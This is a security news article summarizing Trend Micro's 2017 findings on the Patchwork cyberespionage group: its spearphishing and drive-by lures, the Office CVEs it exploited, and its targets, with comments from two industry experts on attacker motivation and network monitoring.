Trend Micro researchers trailed the activities of the Patchwork cybergang over the course of its campaigns in 2017 and though the group may not be as innovative as other cybergangs, the its repertoire of infection vectors and payloads makes them a credible threat.
The group has spoofed a news site to deliver malware-ridden documents, sent spearphishing emails containing malicious links to weaponized documents, and misused email and newsletter distribution services to send spammed messages, according to a Dec. 11 report.
The group has also employed drive-by download tactics by spoofing a social video platform popular in China to trick users into downloading and executing a fake Adobe Flash Player update, which is actually a variant of the xRAT Trojan.
Researchers said the diversity of the groups attack methods are notable as they range from social engineering hooks, attack chains, and backdoors while also looking to exploit recently reported vulnerabilities.
Patchwork also managed to weaponize several documents including Rich Text Format (RTF) files that trigger an exploit for CVE-2012-1856, PowerPoint Open XML Slide Show (PPSX) files exploiting Sandworm (CVE-2014-4114), PowerPoint (PPT) files exploiting CVE-2017-0199, PPSX files that exploit CVE-2017-8570. and RTF files exploiting CVE-2015-1641.
The groups used these methods to target multiple sectors high-profile personalities, business-to-consumer (B2C) online retailers, telecommunications firms, media companies, aerospace researchers, as well as financial institutions in China and South Asia and even the U.K., Turkey, and Israel.
Although the group's motivations aren't entirely known, researchers said the group's activities appear to be cyberespionage related judging by malware they use which seeks mission-critical and confidential data as opposed to information that can be monetized.
Andrew Speakmaster, chief technology officer and founding partner of SiO4 said the group is evolving to deliver specific data to cyber criminals in the underground economy.
“They are part of an evolving cyberespionage group that is marketing and monetizing the data they have available,” Speakmaster said. “We are seeing more and more types of “turnkey” tools and almost “data on demand” from these groups.”
Chris Morales, chief security architect, Vectra Networks added that the groups motivations or even who is attacking ultimately don't matter in the long run.
He added that most organizations rely on threat feeds from government agencies like the FBI, which create noise for organizations not able to understand the specific actors who might target them
“The motivation of the attacker is always financial or competitive gain, or theft of intellectual property,” Morales said. “The who is a constantly changing landscape and very hard to track for most every organizations, which makes tracking organizations in a meaningful way almost impossible for any organizations not employing a team of researchers focused on attribution.”
Morales added that it is more important to focus on those tools and techniques and identify the attacker behaviors as they occur in real time inside your own network.